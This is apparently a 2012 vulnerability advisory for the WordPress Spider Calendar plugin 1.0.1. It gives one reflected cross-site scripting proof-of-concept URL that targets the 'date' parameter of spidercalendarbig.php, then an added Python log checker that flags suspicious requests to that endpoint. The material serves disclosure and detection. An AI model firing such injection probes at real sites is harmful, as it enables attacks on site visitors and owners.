Exploit Title: WordPress Spider Calendar Plugin Multiple Vulnerabilities
Dork: N/A
Date: [02-10-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://wordpress.org/extend/plugins/spider-calendar/
Version: 1.0.1
License: Non-Commercial
Demo: http://wpdemo.web-dorado.com/spider-calendar/
Download: http://downloads.wordpress.org/plugin/spider-calendar.zip
Tested on: [Linux(bt5)-Windows(7ultimate)]
Special greetz: _84kur10_, nav, dedalo, ksha, shine, p0fk, the_s41nt

Description of the WordPress plugin:

Spider Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress calendars available in the WordPress Directory. If you have problems organizing your events and displaying them in a calendar format, then Spider Calendar is the best solution. Maybe you just want to have a quick look at your calendar to remind yourself about future appointments? It would be great if a calendar extension were able to show all events and display them in a widget as a beautiful and customizable calendar on your website. Spider WordPress Calendar is an extraordinarily user-friendly calendar.

Exploit:

XSS: Cross-site scripting

http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig.php?calendar_id=1&cur_page_url=&date=D4NB4R'"()%26%251
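
A log check for the request shown above, as an added example that is not part of the original advisory: it flags requests to spidercalendarbig.php whose query parameters fall outside an allow-list. The value formats assumed for calendar_id and date, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint named in the advisory's proof-of-concept URL.
ENDPOINT = "/front_end/spidercalendarbig.php"
# Assumed value formats; the advisory does not document them.
ALLOWED = {
    "calendar_id": re.compile(r"\d+"),
    "date": re.compile(r"[0-9]{1,4}([-/.][0-9]{1,4}){0,2}"),
}
# Characters that let a reflected value leave an HTML text or attribute context.
HTML_META = re.compile(r"[<>\"'`]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Oct/2012:10:00:01 +0000] "GET /wp-content/plugins/Calendar/front_end/spidercalendarbig.php?calendar_id=1&cur_page_url=&date=2012-10 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Oct/2012:10:00:05 +0000] "GET /wp-content/plugins/Calendar/front_end/spidercalendarbig.php?calendar_id=1&cur_page_url=&date=D4NB4R%27%22()%26%251 HTTP/1.1" 200 5311',
    '203.0.113.9 - - [02/Oct/2012:10:00:09 +0000] "GET /index.php?date=%3Cb%3E HTTP/1.1" 200 900',
]

def audit_line(line):
    """Return {parameter: decoded value} for suspicious values sent to ENDPOINT."""
    match = REQUEST.search(line)
    if not match:
        return {}
    target = urlsplit(match.group(1))
    if not target.path.endswith(ENDPOINT):
        return {}
    findings = {}
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        rule = ALLOWED.get(name)
        if rule is not None:
            # Known parameter: anything outside the assumed format is reported.
            if value and not rule.fullmatch(value):
                findings[name] = value
        elif HTML_META.search(value):
            # Other parameters (e.g. cur_page_url): report HTML metacharacters.
            findings[name] = value
    return findings

def audit_log(lines):
    """Return (line number, findings) for every line with at least one finding."""
    return [(i, f) for i, line in enumerate(lines, 1) if (f := audit_line(line))]

if __name__ == "__main__":
    for lineno, findings in audit_log(SAMPLE_LOG):
        print(lineno, findings)
```

The same allow-list, applied in the plugin before the value is echoed and combined with HTML output encoding, is the corresponding server-side fix.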